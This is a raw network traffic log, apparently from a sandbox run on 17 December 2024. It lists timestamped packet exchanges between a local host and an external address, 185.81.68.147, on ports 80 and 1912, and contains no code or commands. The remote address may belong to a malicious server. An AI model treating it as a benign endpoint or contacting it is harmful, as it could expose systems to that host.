                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.410418987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.411117077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.411389112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.411442041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.412005901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.412161112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.412228107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413053989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413180113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413254023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413949013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.414015055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.414072990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.414894104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415108919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415209055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415882111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415934086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416021109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416800022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416867971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416982889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.417743921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.417874098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.417942047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.418745995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.419053078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.419162035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.419704914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.472908974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.561811924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.561861038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562040091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562228918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562355995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562447071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.563242912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.563493013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.563568115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.564145088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.564258099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.564332962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.565182924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.565237045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.565305948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.566075087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.566143036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.566194057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567029953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567065954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567253113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567961931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.568099976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.568170071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.568964005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569104910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569188118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569852114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569997072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570051908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570159912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570811033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570867062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570938110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.571742058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.571855068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.571918964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.572700977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.572796106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.572906971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.573672056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.573821068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.573875904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.574590921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.574711084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.574856997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.575556993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.575664043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.575867891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.576507092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.576603889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.576731920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.768372059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.768455029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.768508911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.769335985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.769447088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.769498110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.770277023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.770392895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.770483017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.771203995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.771377087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.771456957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.772273064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.772351980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.772414923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.773160934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.773176908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.773308992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.774122000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.774236917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.774487019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.775022030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.775156021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.775331974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776007891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776113987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776375055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.776983976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777036905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777087927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777928114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.777956963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.778033972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.778860092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779016972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779086113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779824972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.779951096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780035019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780792952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780904055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.780988932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.781821012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.781920910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782016993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782789946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782824993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.782932043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.783662081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.783776999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.783845901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.784586906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.784696102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.784792900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.785531044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.785648108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.785696030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.786536932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.786613941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.786691904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.787518024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.787651062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.787695885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.788409948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.788522959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.788583994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.789382935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.789475918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.789777994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.790402889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.790484905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.790544987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.791280985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.791429996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.791497946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792398930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792519093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792570114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792697906 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792751074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792759895 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792803049 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792866945 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792895079 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792947054 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792957067 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792975903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.792993069 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793046951 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793071985 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793148041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793179989 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793248892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793328047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793807030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793862104 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793880939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.793915987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.967344046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.967434883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.968142033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.968305111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.968349934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.969093084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.969218969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.969306946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970092058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970140934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970304966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.970973015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.971071005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.971282959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.971962929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.972104073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.972167015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.972915888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973051071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973145962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973882914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.973970890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.974030018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.974842072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.974967003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975157976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975753069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975873947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.975960016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.976710081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.976824999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.976933956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.977657080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.977777004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.977835894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.978599072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.978622913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.978713036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.979512930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.979660988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.979738951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.980487108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.980529070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.980609894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.981429100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.981518030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.981561899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.982384920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.982453108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.982501030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.983345985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.983453989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.983844042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.984296083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.984402895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.984493017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.985245943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.985407114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.985492945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.986160994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.986279964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.986433983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.987138033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.987260103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.987325907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.988142014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.988219023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.988287926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989088058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989226103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989311934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.989998102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.990196943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.990345001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.990950108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.991090059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.991162062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.991970062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.992002010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.992063046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.992947102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.993043900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.993220091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994018078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994149923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994220018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994849920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.994903088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.995049953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.995740891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.995860100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996059895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996670008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996857882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.996973991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.997605085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.997760057 CET8049709185.81.68.147192.168.2.8
